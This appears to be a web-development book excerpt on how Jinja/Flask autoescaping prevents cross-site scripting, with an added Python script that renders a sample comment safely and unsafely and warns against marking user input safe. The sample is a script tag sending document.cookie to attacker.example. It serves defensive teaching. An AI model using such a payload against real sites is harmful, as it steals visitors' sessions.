October 2018
Intermediate to advanced
332 pages
8h 9m
English
If you try to insert HTML into your page from a variable, for example when you wish to display a blog post, Jinja will automatically escape the output: characters that have meaning in HTML (<, >, &, and quotes) are replaced by their entity equivalents. In Flask this autoescaping is switched on for templates whose names end in .html, .htm, .xml, or .xhtml (and for render_template_string); a bare Jinja Environment has it off unless you enable it yourself. Look at the following example:
{{ "<h1>Post Title</h1>" }}
&lt;h1&gt;Post Title&lt;/h1&gt;
This is a necessary security feature. When an application has inputs that allow users to submit arbitrary text, it opens the door to cross-site scripting (XSS): a malicious user can submit HTML, and in particular script, as their "text". For example, if a user were to submit a script tag as a comment and Jinja didn't escape it, the script would run in the browser of every visitor who viewed the page, with that visitor's session and cookies.
However, we still need a way to display HTML that we know is safe to show, such as the HTML of our blog posts. ...
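As an added example, not code from the book, the following Python script uses the jinja2 and markupsafe packages to render a constructed malicious comment through the same template with and without autoescaping, and then renders a trusted blog-post body that is deliberately marked safe with Markup. The template names, the sample strings and the helper functions are assumptions made for this illustration; the extension-based autoescape rule is configured to mirror Flask's.

```python
"""Added example (not from the book): how Jinja autoescaping neutralises an
injected <script> tag, and how trusted HTML is let through on purpose.
Assumes the jinja2 and markupsafe packages are installed."""
from jinja2 import DictLoader, Environment, select_autoescape
from markupsafe import Markup

# Constructed sample inputs, not real data.
# A comment exactly as a malicious user might submit it.
MALICIOUS_COMMENT = (
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
)
# Markup our own editor produced: trusted, so we want it rendered as HTML.
TRUSTED_POST_BODY = "<h1>Post Title</h1><p>Written by the site owner.</p>"

# Hypothetical templates. The same comment template is stored under two
# names: the .html one gets autoescaping, the .txt one does not, which
# mirrors Flask's rule for file templates.
TEMPLATES = {
    "comment.html": "<div class='comment'>{{ comment }}</div>",
    "comment.txt": "<div class='comment'>{{ comment }}</div>",
    "post.html": "<article>{{ body }}</article>",
}

env = Environment(
    loader=DictLoader(TEMPLATES),
    autoescape=select_autoescape(
        enabled_extensions=("html", "htm", "xml"),
        default_for_string=True,
    ),
)


def render_comment(comment: str, template_name: str = "comment.html") -> str:
    """Render a user comment; escaping depends on the template's extension."""
    return env.get_template(template_name).render(comment=comment)


def render_post(body: str) -> str:
    """Render a post body as ordinary data: it is escaped like any string."""
    return env.get_template("post.html").render(body=body)


def render_trusted_post(body: str) -> str:
    """Render a post body that we vouch for. Wrapping it in Markup tells
    Jinja it is already safe HTML, so autoescaping leaves it alone. This is
    also the footgun: wrap user input here and the XSS is back."""
    return env.get_template("post.html").render(body=Markup(body))


def is_script_neutralised(rendered: str) -> bool:
    """True if no raw <script tag survived rendering."""
    return "<script" not in rendered.lower()


if __name__ == "__main__":
    print("no autoescape :", render_comment(MALICIOUS_COMMENT, "comment.txt"))
    print("autoescape    :", render_comment(MALICIOUS_COMMENT))
    print("post, escaped :", render_post(TRUSTED_POST_BODY))
    print("post, trusted :", render_trusted_post(TRUSTED_POST_BODY))
    print("trusting user :", render_trusted_post(MALICIOUS_COMMENT))
```

The last line of the script is the case to remember: marking a value safe, whether with Markup as here or with Jinja's `safe` filter in the template, switches escaping off for that value, so it must only ever be applied to HTML the application itself produced, never to anything that arrived from a request.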